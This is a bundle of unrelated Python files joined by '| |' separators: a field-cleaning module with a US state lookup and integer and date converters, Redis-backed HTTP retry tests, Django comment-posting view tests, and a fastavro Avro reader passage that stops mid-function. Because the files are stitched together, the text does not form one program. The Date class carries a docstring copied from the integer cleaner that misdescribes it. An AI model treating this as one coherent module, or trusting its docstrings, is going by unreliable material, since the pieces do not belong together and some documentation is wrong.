"NEW HAMPSHIRE": "NH",
"NEW JERSEY": "NJ",
"NEW MEXICO": "NM",
"NEW YORK": "NY",
"NORTH CAROLINA": "NC",
"NORTH DAKOTA": "ND",
"OHIO": "OH",
"OKLAHOMA": "OK",
"OREGON": "OR",
"PENNSYLVANIA": "PA",
"RHODE ISLAND": "RI",
"SOUTH CAROLINA": "SC",
"SOUTH DAKOTA": "SD",
"TENNESSEE": "TN",
"TEXAS": "TX",
"UTAH": "UT",
"VERMONT": "VT",
"VIRGINIA": "VA",
"WASHINGTON": "WA",
"WEST VIRGINIA": "WV",
"WISCONSIN": "WI",
"WYOMING": "WY",
}
def clean(self, d, fn):
if self.default is None:
d[fn] = self.lookup.get(d[fn].upper(), d[fn])
else:
d[fn] = self.lookup.get(d[fn].upper(), self.default)
class Int(FieldRowCleaner):
"""
Convert a value to an integer, optionally taking a default value
Int("a", 0)
{ "a": "1" } => { "a": 1 }
{ "a": "fred" } => { "a": 0 }
"""
def __init__(self, default=0):
self.default = default
def clean(self, d, fn):
s = str(d[fn])
if s.isdigit():
d[fn] = int(s)
else:
assert self.default is not None, "Failed to parse an integer without a default"
d[fn] = self.default
class Date(FieldRowCleaner):
"""
Convert a value to an integer, optionally taking a default value
Int("a", 0)
{ "a": "1" } => { "a": 1 }
{ "a": "fred" } => { "a": 0 }
"""
def __init__(self, format="%m-%d-%Y"):
self.format = format
def clean(self, d, fn):
from datetime import datetime
from time import mktime
try:
dt = datetime.strptime(d[fn], self.format)
# multiply by 1000 to convert to ms
d[fn] = int(mktime(dt.timetuple())) * 1000
except:
d[fn] = None
class FieldCleaner():
def __init__(self, field_name, *cleaners, **kwargs):
extra_fields_to_save = kwargs.get('extra_fields_to_save', None)
self.field_name = field_name
self.output_name = field_name
self.extra_fields_to_save = extra_fields_to_save
self.cleaners = list(cleaners)
if '=>' in field_name:
self.field_name, self.output_name = field_name.split('=>')
self.cleaners.append(Rename(self.field_name, self.output_name))
def clean(self, d):
for cleaner in self.cleaners:
if isinstance(cleaner, Rename):
cleaner.clean(d, self.field_name, self.output_name)
else:
cleaner.clean(d, self.field_name)
| |
import json
import treq
from twisted.trial.unittest import TestCase
from twisted.internet.defer import inlineCallbacks
from vumi_http_retry.retries import (
pending_key, ready_key, inc_req_count, dec_req_count,
get_req_count, set_req_count, add_pending, pop_pending,
add_ready, pop_pending_add_ready, pop_ready, retry, retry_failed,
can_reattempt)
from vumi_http_retry.tests.utils import ToyServer
from vumi_http_retry.tests.redis import create_client, zitems, lvalues, delete
class TestRetries(TestCase):
@inlineCallbacks
def setUp(self):
self.redis = yield create_client()
@inlineCallbacks
def tearDown(self):
yield delete(self.redis, "test.*")
self.redis.transport.loseConnection()
def redis_spy(self, name):
calls = []
fn = getattr(self.redis, name)
def wrapper(*a, **kw):
calls.append((a, kw))
return fn(*a, **kw)
self.patch(self.redis, name, wrapper)
return calls
@inlineCallbacks
def test_req_count(self):
self.assertEqual((yield get_req_count(self.redis, 'test', '1234')), 0)
yield inc_req_count(self.redis, 'test', '1234')
self.assertEqual((yield get_req_count(self.redis, 'test', '1234')), 1)
yield dec_req_count(self.redis, 'test', '1234')
self.assertEqual((yield get_req_count(self.redis, 'test', '1234')), 0)
yield set_req_count(self.redis, 'test', '1234', 3)
self.assertEqual((yield get_req_count(self.redis, 'test', '1234')), 3)
@inlineCallbacks
def test_add_pending(self):
k = pending_key('test')
self.assertEqual((yield zitems(self.redis, k)), [])
yield add_pending(self.redis, 'test', {
'owner_id': '1234',
'timestamp': 10,
'intervals': [50, 60],
'request': {'foo': 23}
})
self.assertEqual((yield zitems(self.redis, k)), [
(10 + 50, {
'owner_id': '1234',
'timestamp': 10,
'attempts': 0,
'intervals': [50, 60],
'request': {'foo': 23},
}),
])
yield add_pending(self.redis, 'test', {
'owner_id': '1234',
'timestamp': 5,
'intervals': [20, 90],
'request': {'bar': 42}
})
self.assertEqual((yield zitems(self.redis, k)), [
(5 + 20, {
'owner_id': '1234',
'timestamp': 5,
'attempts': 0,
'intervals': [20, 90],
'request': {'bar': 42},
}),
(10 + 50, {
'owner_id': '1234',
'timestamp': 10,
'attempts': 0,
'intervals': [50, 60],
'request': {'foo': 23},
}),
])
@inlineCallbacks
def test_add_pending_next_retry(self):
k = pending_key('test')
self.assertEqual((yield zitems(self.redis, k)), [])
yield add_pending(self.redis, 'test', {
'owner_id': '1234',
'timestamp': 10,
'attempts': 1,
'intervals': [50, 60],
'request': {'foo': 23}
})
self.assertEqual((yield zitems(self.redis, k)), [
(10 + 60, {
'owner_id': '1234',
'timestamp': 10,
'attempts': 1,
'intervals': [50, 60],
'request': {'foo': 23},
}),
])
yield add_pending(self.redis, 'test', {
'owner_id': '1234',
'timestamp': 5,
'attempts': 2,
'intervals': [20, 90, 100],
'request': {'bar': 42}
})
self.assertEqual((yield zitems(self.redis, k)), [
(10 + 60, {
'owner_id': '1234',
'timestamp': 10,
'attempts': 1,
'intervals': [50, 60],
'request': {'foo': 23},
}),
(5 + 100, {
'owner_id': '1234',
'timestamp': 5,
'attempts': 2,
'intervals': [20, 90, 100],
'request': {'bar': 42},
}),
])
@inlineCallbacks
def test_pop_pending(self):
k = pending_key('test')
for t in range(5, 35, 5):
yield add_pending(self.redis, 'test', {
'owner_id': '1234',
'timestamp': t,
'attempts': 0,
'intervals': [10],
'request': {'foo': t}
})
pending = yield zitems(self.redis, k)
pending_reqs = [r for t, r in pending]
result = yield pop_pending(self.redis, 'test', 0, 10 + 13)
self.assertEqual(result, pending_reqs[:2])
self.assertEqual((yield zitems(self.redis, k)), pending[2:])
result = yield pop_pending(self.redis, 'test', 10 + 18, 10 + 27)
self.assertEqual(result, pending_reqs[3:5])
self.assertEqual(
(yield zitems(self.redis, k)),
pending[2:3] + pending[5:])
result = yield pop_pending(self.redis, 'test', 0, 50)
self.assertEqual(result, pending_reqs[2:3] + pending_reqs[5:])
self.assertEqual((yield zitems(self.redis, k)), [])
@inlineCallbacks
def test_pop_pending_limit(self):
k = pending_key('test')
for t in range(5, 40, 5):
yield add_pending(self.redis, 'test', {
'owner_id': '1234',
'timestamp': t,
'attempts': 0,
'intervals': [10],
'request': {'foo': t}
})
pending = yield zitems(self.redis, k)
pending_reqs = [r for t, r in pending]
result = yield pop_pending(self.redis, 'test', 0, 50, limit=2)
self.assertEqual(result, pending_reqs[:2])
self.assertEqual((yield zitems(self.redis, k)), pending[2:])
result = yield pop_pending(self.redis, 'test', 0, 50, limit=3)
self.assertEqual(result, pending_reqs[2:5])
self.assertEqual((yield zitems(self.redis, k)), pending[5:])
result = yield pop_pending(self.redis, 'test', 0, 50, limit=3)
self.assertEqual(result, pending_reqs[5:])
self.assertEqual((yield zitems(self.redis, k)), [])
result = yield pop_pending(self.redis, 'test', 0, 50, limit=3)
self.assertEqual(result, [])
self.assertEqual((yield zitems(self.redis, k)), [])
@inlineCallbacks
def test_pop_pending_no_deserialize(self):
k = pending_key('test')
for t in range(5, 35, 5):
yield add_pending(self.redis, 'test', {
'owner_id': '1234',
'timestamp': t,
'attempts': 0,
'intervals': [10],
'request': {'foo': t}
})
pending = yield zitems(self.redis, k)
pending_reqs = [r for t, r in pending]
result = yield pop_pending(
self.redis, 'test', 0, 10 + 13, deserialize=False)
self.assertEqual([json.loads(r) for r in result], pending_reqs[:2])
@inlineCallbacks
def test_add_ready(self):
k = ready_key('test')
req1 = {
'owner_id': '1234',
'timestamp': 5,
'attempts': 0,
'intervals': [10],
'request': {'foo': 23}
}
req2 = {
'owner_id': '1234',
'timestamp': 10,
'attempts': 0,
'intervals': [10],
'request': {'bar': 42}
}
req3 = {
'owner_id': '1234',
'timestamp': 15,
'attempts': 0,
'intervals': [10],
'request': {'baz': 21}
}
self.assertEqual((yield lvalues(self.redis, k)), [])
yield add_ready(self.redis, 'test', [])
self.assertEqual((yield lvalues(self.redis, k)), [])
yield add_ready(self.redis, 'test', [req1])
self.assertEqual((yield lvalues(self.redis, k)), [req1])
yield add_ready(self.redis, 'test', [req2, req3])
self.assertEqual((yield lvalues(self.redis, k)), [req1, req2, req3])
@inlineCallbacks
def test_add_ready_no_serialize(self):
k = ready_key('test')
req1 = {
'owner_id': '1234',
'timestamp': 5,
'attempts': 0,
'intervals': [10],
'request': {'foo': 23}
}
req2 = {
'owner_id': '1234',
'timestamp': 10,
'attempts': 0,
'intervals': [10],
'request': {'bar': 42}
}
yield add_ready(
self.redis, 'test', [json.dumps(req1), json.dumps(req2)],
serialize=False)
self.assertEqual((yield lvalues(self.redis, k)), [req1, req2])
@inlineCallbacks
def test_pop_pending_add_ready(self):
k_p = pending_key('test')
k_r = ready_key('test')
for t in range(5, 40, 5):
yield add_pending(self.redis, 'test', {
'owner_id': '1234',
'timestamp': t,
'attempts': 0,
'intervals': [10],
'request': {'foo': t}
})
pending_reqs = [r for t, r in (yield zitems(self.redis, k_p))]
yield pop_pending_add_ready(self.redis, 'test', 0, 50)
self.assertEqual((yield lvalues(self.redis, k_r)), pending_reqs)
self.assertEqual((yield zitems(self.redis, k_p)), [])
@inlineCallbacks
def test_pop_pending_add_ready_chunks(self):
calls = self.redis_spy('zrangebyscore')
k = pending_key('test')
for t in range(5, 40, 5):
yield add_pending(self.redis, 'test', {
'owner_id': '1234',
'timestamp': t,
'attempts': 0,
'intervals': [10],
'request': {'foo': t}
})
yield pop_pending_add_ready(
self.redis, 'test', 0, 50, chunk_size=3)
self.assertEqual(calls, 4 * [
((k, 0, 50), {
'offset': 0,
'count': 3
}),
])
@inlineCallbacks
def test_pop_pending_add_ready_chunks_tap(self):
k_p = pending_key('test')
taps = []
for t in range(5, 40, 5):
yield add_pending(self.redis, 'test', {
'owner_id': '1234',
'timestamp': t,
'attempts': 0,
'intervals': [10],
'request': {'foo': t}
})
pending_reqs = yield self.redis.zrange(k_p, 0, -1)
yield pop_pending_add_ready(
self.redis, 'test', 0, 50, chunk_size=3, tap=taps.append)
self.assertEqual(taps, [
pending_reqs[:3],
pending_reqs[3:6],
pending_reqs[6:],
])
@inlineCallbacks
def test_pop_ready(self):
k = ready_key('test')
req1 = {
'owner_id': '1234',
'timestamp': 5,
'attempts': 0,
'intervals': [10],
'request': {'foo': 23}
}
req2 = {
'owner_id': '1234',
'timestamp': 10,
'attempts': 0,
'intervals': [10],
'request': {'bar': 42}
}
yield add_ready(self.redis, 'test', [req1, req2])
self.assertEqual((yield lvalues(self.redis, k)), [req1, req2])
result = yield pop_ready(self.redis, 'test')
self.assertEqual(result, req1)
self.assertEqual((yield lvalues(self.redis, k)), [req2])
result = yield pop_ready(self.redis, 'test')
self.assertEqual(result, req2)
self.assertEqual((yield lvalues(self.redis, k)), [])
result = yield pop_ready(self.redis, 'test')
self.assertEqual(result, None)
self.assertEqual((yield lvalues(self.redis, k)), [])
@inlineCallbacks
def test_retry(self):
srv = yield ToyServer.from_test(self)
reqs = []
@srv.app.route('/foo')
def route(req):
reqs.append(req)
return 'ok'
resp = yield retry({
'owner_id': '1234',
'timestamp': 5,
'attempts': 0,
'intervals': [10],
'request': {
'url': "%s/foo" % (srv.url,),
'method': 'POST'
}
}, persistent=False)
self.assertEqual(resp.code, 200)
self.assertEqual((yield resp.content()), 'ok')
[req] = reqs
self.assertEqual(req.method, 'POST')
@inlineCallbacks
def test_retry_data(self):
srv = yield ToyServer.from_test(self)
contents = []
@srv.app.route('/foo')
def route(req):
contents.append(req.content.read())
yield retry({
'owner_id': '1234',
'timestamp': 5,
'attempts': 0,
'intervals': [10],
'request': {
'url': "%s/foo" % (srv.url,),
'method': 'POST',
'body': 'hi'
}
}, persistent=False)
self.assertEqual(contents, ['hi'])
@inlineCallbacks
def test_retry_headers(self):
srv = yield ToyServer.from_test(self)
headers = []
@srv.app.route('/foo')
def route(req):
headers.append({
'X-Foo': req.requestHeaders.getRawHeaders('X-Foo'),
'X-Bar': req.requestHeaders.getRawHeaders('X-Bar')
})
yield retry({
'owner_id': '1234',
'timestamp': 5,
'attempts': 0,
'intervals': [10],
'request': {
'url': "%s/foo" % (srv.url,),
'method': 'POST',
'headers': {
'X-Foo': ['a', 'b'],
'X-Bar': ['c', 'd'],
}
}
}, persistent=False)
self.assertEqual(headers, [{
'X-Foo': ['a', 'b'],
'X-Bar': ['c', 'd'],
}])
@inlineCallbacks
def test_retry_inc_attempts(self):
srv = yield ToyServer.from_test(self)
@srv.app.route('/foo')
def route(_):
pass
req = {
'owner_id': '1234',
'timestamp': 5,
'attempts': 0,
'intervals': [10, 20, 30],
'request': {
'url': "%s/foo" % (srv.url,),
'method': 'GET'
}
}
yield retry(req, persistent=False)
self.assertEqual(req['attempts'], 1)
yield retry(req, persistent=False)
self.assertEqual(req['attempts'], 2)
yield retry(req, persistent=False)
self.assertEqual(req['attempts'], 3)
@inlineCallbacks
def test_retry_unicode(self):
srv = yield ToyServer.from_test(self)
reqs = []
@srv.app.route('/')
def route(req):
reqs.append({
'method': req.method,
'body': req.content.read(),
'headers': {
'X-Bar': req.requestHeaders.getRawHeaders('X-Bar'),
}
})
yield retry({
'owner_id': '1234',
'timestamp': 5,
'attempts': 0,
'intervals': [10, 20, 30],
'request': {
'url': u"%s" % (srv.url,),
'method': u'POST',
'body': u'foo',
'headers': {u'X-Bar': [u'baz', u'quux']}
}
}, persistent=False)
[req] = reqs
self.assertEqual(req, {
'method': 'POST',
'body': 'foo',
'headers': {'X-Bar': ['baz', 'quux']}
})
@inlineCallbacks
def test_retry_failed(self):
srv = yield ToyServer.from_test(self)
@srv.app.route('/<int:code>')
def route(req, code):
req.setResponseCode(code)
def send(code):
return treq.get("%s/%s" % (srv.url, code), persistent=False)
self.assertFalse(retry_failed((yield send(200))))
self.assertFalse(retry_failed((yield send(201))))
self.assertFalse(retry_failed((yield send(400))))
self.assertFalse(retry_failed((yield send(404))))
self.assertTrue(retry_failed((yield send(500))))
self.assertTrue(retry_failed((yield send(504))))
self.assertTrue(retry_failed((yield send(599))))
def test_can_reattempt(self):
req = {
'owner_id': '1234',
'timestamp': 5,
'attempts': 0,
'intervals': [10, 20, 30],
'request': {
'url': "/foo",
'method': 'GET'
}
}
self.assertTrue(can_reattempt(req))
req['attempts'] = 1
self.assertTrue(can_reattempt(req))
req['attempts'] = 2
self.assertTrue(can_reattempt(req))
req['attempts'] = 3
self.assertFalse(can_reattempt(req))
| |
from __future__ import absolute_import, unicode_literals
import re
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.comments import signals
from django.contrib.comments.models import Comment
from . import CommentTestCase
from ..models import Article, Book
post_redirect_re = re.compile(r'^http://testserver/posted/\?c=(?P<pk>\d+$)')
class CommentViewTests(CommentTestCase):
def testPostCommentHTTPMethods(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
response = self.client.get("/post/", data)
self.assertEqual(response.status_code, 405)
self.assertEqual(response["Allow"], "POST")
def testPostCommentMissingCtype(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
del data["content_type"]
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testPostCommentBadCtype(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["content_type"] = "Nobody expects the Spanish Inquisition!"
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testPostCommentMissingObjectPK(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
del data["object_pk"]
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testPostCommentBadObjectPK(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["object_pk"] = "14"
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testPostInvalidIntegerPK(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["comment"] = "This is another comment"
data["object_pk"] = '\ufffd'
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testPostInvalidDecimalPK(self):
b = Book.objects.get(pk='12.34')
data = self.getValidData(b)
data["comment"] = "This is another comment"
data["object_pk"] = 'cookies'
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testCommentPreview(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["preview"] = "Preview"
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "comments/preview.html")
def testHashTampering(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["security_hash"] = "Nobody expects the Spanish Inquisition!"
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
def testDebugCommentErrors(self):
"""The debug error template should be shown only if DEBUG is True"""
olddebug = settings.DEBUG
settings.DEBUG = True
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["security_hash"] = "Nobody expects the Spanish Inquisition!"
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
self.assertTemplateUsed(response, "comments/400-debug.html")
settings.DEBUG = False
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
self.assertTemplateNotUsed(response, "comments/400-debug.html")
settings.DEBUG = olddebug
def testCreateValidComment(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
self.response = self.client.post("/post/", data, REMOTE_ADDR="1.2.3.4")
self.assertEqual(self.response.status_code, 302)
self.assertEqual(Comment.objects.count(), 1)
c = Comment.objects.all()[0]
self.assertEqual(c.ip_address, "1.2.3.4")
self.assertEqual(c.comment, "This is my comment")
def testPostAsAuthenticatedUser(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data['name'] = data['email'] = ''
self.client.login(username="normaluser", password="normaluser")
self.response = self.client.post("/post/", data, REMOTE_ADDR="1.2.3.4")
self.assertEqual(self.response.status_code, 302)
self.assertEqual(Comment.objects.count(), 1)
c = Comment.objects.all()[0]
self.assertEqual(c.ip_address, "1.2.3.4")
u = User.objects.get(username='normaluser')
self.assertEqual(c.user, u)
self.assertEqual(c.user_name, u.get_full_name())
self.assertEqual(c.user_email, u.email)
def testPostAsAuthenticatedUserWithoutFullname(self):
"""
Check that the user's name in the comment is populated for
authenticated users without first_name and last_name.
"""
user = User.objects.create_user(username='jane_other',
email='jane@example.com', password='jane_other')
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data['name'] = data['email'] = ''
self.client.login(username="jane_other", password="jane_other")
self.response = self.client.post("/post/", data, REMOTE_ADDR="1.2.3.4")
c = Comment.objects.get(user=user)
self.assertEqual(c.ip_address, "1.2.3.4")
self.assertEqual(c.user_name, 'jane_other')
user.delete()
def testPreventDuplicateComments(self):
"""Prevent posting the exact same comment twice"""
a = Article.objects.get(pk=1)
data = self.getValidData(a)
self.client.post("/post/", data)
self.client.post("/post/", data)
self.assertEqual(Comment.objects.count(), 1)
# This should not trigger the duplicate prevention
self.client.post("/post/", dict(data, comment="My second comment."))
self.assertEqual(Comment.objects.count(), 2)
def testCommentSignals(self):
"""Test signals emitted by the comment posting view"""
# callback
def receive(sender, **kwargs):
self.assertEqual(kwargs['comment'].comment, "This is my comment")
self.assertTrue('request' in kwargs)
received_signals.append(kwargs.get('signal'))
# Connect signals and keep track of handled ones
received_signals = []
expected_signals = [
signals.comment_will_be_posted, signals.comment_was_posted
]
for signal in expected_signals:
signal.connect(receive)
# Post a comment and check the signals
self.testCreateValidComment()
self.assertEqual(received_signals, expected_signals)
for signal in expected_signals:
signal.disconnect(receive)
def testWillBePostedSignal(self):
"""
Test that the comment_will_be_posted signal can prevent the comment from
actually getting saved
"""
def receive(sender, **kwargs): return False
signals.comment_will_be_posted.connect(receive, dispatch_uid="comment-test")
a = Article.objects.get(pk=1)
data = self.getValidData(a)
response = self.client.post("/post/", data)
self.assertEqual(response.status_code, 400)
self.assertEqual(Comment.objects.count(), 0)
signals.comment_will_be_posted.disconnect(dispatch_uid="comment-test")
def testWillBePostedSignalModifyComment(self):
"""
Test that the comment_will_be_posted signal can modify a comment before
it gets posted
"""
def receive(sender, **kwargs):
# a bad but effective spam filter :)...
kwargs['comment'].is_public = False
signals.comment_will_be_posted.connect(receive)
self.testCreateValidComment()
c = Comment.objects.all()[0]
self.assertFalse(c.is_public)
def testCommentNext(self):
"""Test the different "next" actions the comment view can take"""
a = Article.objects.get(pk=1)
data = self.getValidData(a)
response = self.client.post("/post/", data)
location = response["Location"]
match = post_redirect_re.match(location)
self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
data["next"] = "/somewhere/else/"
data["comment"] = "This is another comment"
response = self.client.post("/post/", data)
location = response["Location"]
match = re.search(r"^http://testserver/somewhere/else/\?c=\d+$", location)
self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
data["next"] = "http://badserver/somewhere/else/"
data["comment"] = "This is another comment with an unsafe next url"
response = self.client.post("/post/", data)
location = response["Location"]
match = post_redirect_re.match(location)
self.assertTrue(match != None, "Unsafe redirection to: %s" % location)
def testCommentDoneView(self):
a = Article.objects.get(pk=1)
data = self.getValidData(a)
response = self.client.post("/post/", data)
location = response["Location"]
match = post_redirect_re.match(location)
self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
pk = int(match.group('pk'))
response = self.client.get(location)
self.assertTemplateUsed(response, "comments/posted.html")
self.assertEqual(response.context[0]["comment"], Comment.objects.get(pk=pk))
def testCommentNextWithQueryString(self):
"""
The `next` key needs to handle already having a query string (#10585)
"""
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["next"] = "/somewhere/else/?foo=bar"
data["comment"] = "This is another comment"
response = self.client.post("/post/", data)
location = response["Location"]
match = re.search(r"^http://testserver/somewhere/else/\?foo=bar&c=\d+$", location)
self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
def testCommentPostRedirectWithInvalidIntegerPK(self):
"""
Tests that attempting to retrieve the location specified in the
post redirect, after adding some invalid data to the expected
querystring it ends with, doesn't cause a server error.
"""
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["comment"] = "This is another comment"
response = self.client.post("/post/", data)
location = response["Location"]
broken_location = location + "\ufffd"
response = self.client.get(broken_location)
self.assertEqual(response.status_code, 200)
def testCommentNextWithQueryStringAndAnchor(self):
"""
The `next` key needs to handle already having an anchor. Refs #13411.
"""
# With a query string also.
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["next"] = "/somewhere/else/?foo=bar#baz"
data["comment"] = "This is another comment"
response = self.client.post("/post/", data)
location = response["Location"]
match = re.search(r"^http://testserver/somewhere/else/\?foo=bar&c=\d+#baz$", location)
self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
# Without a query string
a = Article.objects.get(pk=1)
data = self.getValidData(a)
data["next"] = "/somewhere/else/#baz"
data["comment"] = "This is another comment"
response = self.client.post("/post/", data)
location = response["Location"]
match = re.search(r"^http://testserver/somewhere/else/\?c=\d+#baz$", location)
self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
| |
# cython: auto_cpdef=True
"""Python code for reading AVRO files"""
# This code is a modified version of the code at
# http://svn.apache.org/viewvc/avro/trunk/lang/py/src/avro/ which is under
# Apache 2.0 license (http://www.apache.org/licenses/LICENSE-2.0)
import json
from struct import unpack, error as StructError
from zlib import decompress
import datetime
from decimal import localcontext, Decimal
from uuid import UUID
try:
from fastavro._six import MemoryIO, xrange, btou, utob, iteritems,\
is_str, str2ints, fstint
from fastavro._schema import (
extract_record_type, acquaint_schema, populate_schema_defs,
extract_logical_type
)
except ImportError:
from fastavro.six import MemoryIO, xrange, btou, utob, iteritems, \
is_str, str2ints, fstint
from fastavro.schema import (
extract_record_type, acquaint_schema, populate_schema_defs,
extract_logical_type
)
from fastavro.const import MCS_PER_HOUR, MCS_PER_MINUTE, MCS_PER_SECOND, \
MLS_PER_HOUR, MLS_PER_MINUTE, MLS_PER_SECOND
VERSION = 1
MAGIC = b'Obj' + utob(chr(VERSION))
SYNC_SIZE = 16
HEADER_SCHEMA = {
'type': 'record',
'name': 'org.apache.avro.file.Header',
'fields': [
{
'name': 'magic',
'type': {'type': 'fixed', 'name': 'magic', 'size': len(MAGIC)},
},
{
'name': 'meta',
'type': {'type': 'map', 'values': 'bytes'}
},
{
'name': 'sync',
'type': {'type': 'fixed', 'name': 'sync', 'size': SYNC_SIZE}
},
]
}
MASK = 0xFF
AVRO_TYPES = set([
'boolean',
'bytes',
'double',
'float',
'int',
'long',
'null',
'string',
'fixed',
'enum',
'record',
'error',
'array',
'map',
'union',
'request',
'error_union'
])
class SchemaResolutionError(Exception):
pass
def match_types(writer_type, reader_type):
if isinstance(writer_type, list) or isinstance(reader_type, list):
return True
if writer_type == reader_type:
return True
# promotion cases
elif writer_type == 'int' and reader_type in ['long', 'float', 'double']:
return True
elif writer_type == 'long' and reader_type in ['float', 'double']:
return True
elif writer_type == 'float' and reader_type == 'double':
return True
return False
def match_schemas(w_schema, r_schema):
error_msg = 'Schema mismatch: %s is not %s' % (w_schema, r_schema)
if isinstance(w_schema, list):
# If the writer is a union, checks will happen in read_union after the
# correct schema is known
return True
elif isinstance(r_schema, list):
# If the reader is a union, ensure one of the new schemas is the same
# as the writer
for schema in r_schema:
if match_types(w_schema, schema):
return True
else:
raise SchemaResolutionError(error_msg)
else:
# Check for dicts as primitive types are just strings
if isinstance(w_schema, dict):
w_type = w_schema['type']
else:
w_type = w_schema
if isinstance(r_schema, dict):
r_type = r_schema['type']
else:
r_type = r_schema
if w_type == r_type == 'map':
if match_types(w_schema['values'], r_schema['values']):
return True
elif w_type == r_type == 'array':
if match_types(w_schema['items'], r_schema['items']):
return True
elif match_types(w_type, r_type):
return True
raise SchemaResolutionError(error_msg)
def read_null(fo, writer_schema=None, reader_schema=None):
"""null is written as zero bytes."""
return None
def read_boolean(fo, writer_schema=None, reader_schema=None):
"""A boolean is written as a single byte whose value is either 0 (false) or
1 (true).
"""
# technically 0x01 == true and 0x00 == false, but many languages will cast
# anything other than 0 to True and only 0 to False
return unpack('B', fo.read(1))[0] != 0
def parse_timestamp(data, resolution):
return datetime.datetime.fromtimestamp(data / resolution)
def read_timestamp_millis(data, writer_schema=None, reader_schema=None):
return parse_timestamp(data, float(MLS_PER_SECOND))
def read_timestamp_micros(data, writer_schema=None, reader_schema=None):
return parse_timestamp(data, float(MCS_PER_SECOND))
def read_date(data, writer_schema=None, reader_schema=None):
return datetime.date.fromordinal(data)
def read_uuid(data, writer_schema=None, reader_schema=None):
return UUID(data)
def read_time_millis(data, writer_schema=None, reader_schema=None):
h = int(data / MLS_PER_HOUR)
m = int(data / MLS_PER_MINUTE) % 60
s = int(data / MLS_PER_SECOND) % 60
mls = int(data % MLS_PER_SECOND) * 1000
return datetime.time(h, m, s, mls)
def read_time_micros(data, writer_schema=None, reader_schema=None):
h = int(data / MCS_PER_HOUR)
m = int(data / MCS_PER_MINUTE) % 60
s = int(data / MCS_PER_SECOND) % 60
mcs = data % MCS_PER_SECOND
return datetime.time(h, m, s, mcs)
def read_bytes_decimal(data, writer_schema=None, reader_schema=None):
"""
Decimal is encoded as fixed. Fixed instances are encoded using the
number of bytes declared in the schema.
based on https://github.com/apache/avro/pull/82/
"""
scale = writer_schema['scale']
precision = writer_schema['precision']
size = len(data)
datum_byte = str2ints(data)
unscaled_datum = 0
msb = fstint(data)
leftmost_bit = (msb >> 7) & 1
if leftmost_bit == 1:
modified_first_byte = datum_byte[0] ^ (1 << 7)
datum_byte = [modified_first_byte] + datum_byte[1:]
for offset in xrange(size):
unscaled_datum <<= 8
unscaled_datum += datum_byte[offset]
unscaled_datum += pow(-2, (size * 8) - 1)
else:
for offset in xrange(size):
unscaled_datum <<= 8
unscaled_datum += (datum_byte[offset])
with localcontext() as ctx:
ctx.prec = precision
scaled_datum = Decimal(unscaled_datum).scaleb(-scale)
return scaled_datum
def read_long(fo, writer_schema=None, reader_schema=None):
"""int and long values are written using variable-length, zig-zag
coding."""
c = fo.read(1)
# We do EOF checking only here, since most reader start here
if not c:
raise StopIteration
b = ord(c)
n = b & 0x7F
shift = 7
while (b & 0x80) != 0:
b = ord(fo.read(1))
n |= (b & 0x7F) << shift
shift += 7
return (n >> 1) ^ -(n & 1)
def read_float(fo, writer_schema=None, reader_schema=None):
"""A float is written as 4 bytes.
The float is converted into a 32-bit integer using a method equivalent to
Java's floatToIntBits and then encoded in little-endian format.
"""
return unpack('<f', fo.read(4))[0]
def read_double(fo, writer_schema=None, reader_schema=None):
"""A double is written as 8 bytes.
The double is converted into a 64-bit integer using a method equivalent to
Java's doubleToLongBits and then encoded in little-endian format.
"""
return unpack('<d', fo.read(8))[0]
def read_bytes(fo, writer_schema=None, reader_schema=None):
"""Bytes are encoded as a long followed by that many bytes of data."""
size = read_long(fo)
return fo.read(size)
def read_utf8(fo, writer_schema=None, reader_schema=None):
"""A string is encoded as a long followed by that many bytes of UTF-8
encoded character data.
"""
return btou(read_bytes(fo), 'utf-8')
def read_fixed(fo, writer_schema, reader_schema=None):
"""Fixed instances are encoded using the number of bytes declared in the
schema."""
return fo.read(writer_schema['size'])
def read_enum(fo, writer_schema, reader_schema=None):
"""An enum is encoded by a int, representing the zero-based position of the
symbol in the schema.
"""
index = read_long(fo)
symbol = writer_schema['symbols'][index]
if reader_schema and symbol not in reader_schema['symbols']:
symlist = reader_schema['symbols']
msg = '%s not found in reader symbol list %s' % (symbol, symlist)
raise SchemaResolutionError(msg)
return symbol
def read_array(fo, writer_schema, reader_schema=None):
"""Arrays are encoded as a series of blocks.
Each block consists of a long count value, followed by that many array
items. A block with count zero indicates the end of the array. Each item
is encoded per the array's item schema.
If a block's count is negative, then the count is followed immediately by a
long block size, indicating the number of bytes in the block. The actual
count in this case is the absolute value of the count written.
"""
if reader_schema:
def item_reader(fo, w_schema, r_schema):
return read_data(fo, w_schema['items'], r_schema['items'])
else:
def item_reader(fo, w_schema, _):
return read_data(fo, w_schema['items'])
read_items = []
block_count = read_long(fo)
while block_count != 0:
if block_count < 0:
block_count = -block_count
# Read block size, unused
read_long(fo)
for i in xrange(block_count):
